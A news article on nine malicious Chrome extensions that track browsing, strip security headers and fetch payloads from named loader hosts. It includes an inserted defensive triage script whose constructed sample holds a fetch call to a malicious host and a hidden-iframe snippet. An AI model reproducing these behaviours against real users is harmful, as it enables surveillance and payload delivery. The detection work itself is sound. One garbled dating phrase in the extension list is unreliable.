Cybersecurity researchers have recently discovered nine different malicious Chrome extensions that together have over 50,000 downloads. These extensions can hijack affiliate links and track all of a user’s web activity. They also strip security headers from web responses, which exposes users to serious privacy and security harm. The extensions carried familiar-sounding names, including “Free VPN,” “Screenshot,” and “Weather (weather-best-forecast).”
The attack chain begins with a seemingly benign logo file that is downloaded the first time one of the malicious extensions loads. Once active, the extensions can inject hidden iframes that connect to URLs on attacker-controlled servers. Importantly, they do all this while circumventing CAPTCHA hurdles, which are often used to block spammy bot behavior. This broad ability to surveil users has alarming potential for misuse.
How the Malware Operates
The threat actors behind the malicious extensions rely on heavy obfuscation to evade detection and lie dormant for long periods of time. They build in time-based delays that keep the malware from starting up until more than a week after installation. This tactic makes it even harder to find and fully remove the malicious code quickly.
Moreover, the malware does not even download its payload about 90% of the time. The loader in the malicious code calls out to external servers; specifically, it contacts “www.liveupdt.com” or “www.dealctr.com” to download the initial payload, and it waits 48 hours between attempts. This latency further complicates the ability of security systems to identify the emerging threat in real time.
“Why would malware need to bypass CAPTCHAs? Because some of its operations, like the hidden iframe injections, trigger bot detection.” – Lotan Sery and Noga Gouldman
The code in the extensions then reads the active tab’s content and looks for markers containing the “===” sequence. It uses these markers to reconstruct the JavaScript code required for its malicious activities.
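The behaviours described in this section (beaconing to the two loader hosts, multi-day dormancy timers, hidden iframe injection and header stripping) can be screened for statically in an unpacked extension. The following is an added defender-side triage script, not code from the report or from the extensions; the loader hosts come from the report, while the set of security headers checked and the sample files are assumptions constructed for illustration.

```python
"""Static triage of an unpacked Chrome extension for the behaviours described above:
beaconing to the named loader hosts, multi-day dormancy timers, hidden iframe
injection and rules that strip security headers. Added example, not report code."""
import json
import re

LOADER_HOSTS = {"www.liveupdt.com", "www.dealctr.com"}  # hosts named in the report
SECURITY_HEADERS = {"content-security-policy", "x-frame-options",   # assumed set
                    "strict-transport-security"}
ONE_WEEK_MS = 7 * 24 * 60 * 60 * 1000

def scan_js(src: str) -> list[str]:
    """Heuristic indicators in one script. Only literal delays are caught;
    computed ones (days * 86400000) still need manual review."""
    hits = [f"contacts loader host {h}" for h in sorted(LOADER_HOSTS) if h in src]
    for m in re.finditer(r"set(?:Timeout|Interval)\(.*?,\s*(\d+)\s*\)", src, re.S):
        ms = int(m.group(1))
        if ms >= ONE_WEEK_MS:
            hits.append(f"dormancy timer of {ms // 86_400_000} days")
    if (re.search(r"""createElement\(\s*["']iframe["']\s*\)""", src)
            and re.search(r"""display\s*[:=]\s*["']?none""", src)):
        hits.append("hidden iframe injection")
    return hits

def scan_rules(rules_json: str) -> list[str]:
    """declarativeNetRequest rules that remove security response headers."""
    hits = []
    for rule in json.loads(rules_json):
        for h in rule.get("action", {}).get("responseHeaders", []):
            if (h.get("operation") == "remove"
                    and h.get("header", "").lower() in SECURITY_HEADERS):
                hits.append(f"rule {rule.get('id')} removes {h['header']}")
    return hits

def triage(files: dict[str, str]) -> dict[str, list[str]]:
    """Map each file of an unpacked extension to the indicators found in it."""
    report = {}
    for name, content in files.items():
        found = scan_rules(content) if name.endswith(".json") else scan_js(content)
        if found:
            report[name] = found
    return report

# Constructed sample mimicking the reported behaviour; not real extension code.
SAMPLE = {
    "background.js": "setTimeout(() => fetch('https://www.liveupdt.com/u'), 691200000);",
    "content.js": "const f = document.createElement('iframe'); f.style.display = 'none';",
    "rules.json": json.dumps([{"id": 1, "action": {"type": "modifyHeaders", "responseHeaders":
                  [{"header": "X-Frame-Options", "operation": "remove"}]}}]),
}
```

Running `triage(SAMPLE)` flags all three constructed files; on a real unpacked extension, read each file from disk into the same name-to-content mapping and review any hit by hand, since these checks are heuristics and obfuscated code can evade them.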
Extension List and Potential Risks
The Add-ons blocklist contains every compromised extension as well as several other extensions commonly downloaded by users. Along with “Free VPN,” “Screenshot,” and “Weather (weather-best-forecast),” other identified extensions include “Cache – Fast site loader,” “Free MP3 Downloader,” and various Google Translate variants such as “Google Translate (google-translate-right-clicks)” and “Translator – Google Bing Baidu DeepL.” The most venerable of these, “Dark Mode,” debuted the day after T–25, on October 25, 2024; it lets users enable a dark theme on all sites.
The consequences of using these extensions go well beyond mere inconvenience. By monitoring user behavior and hijacking affiliate links, they pose a significant risk to consumer privacy.
“Free VPNs promise privacy, but nothing in life comes free.” – Koi Security
It is no surprise that, as consumers continue to use these seemingly innocuous tools, they become unwitting guinea pigs for data breaches and invasive surveillance.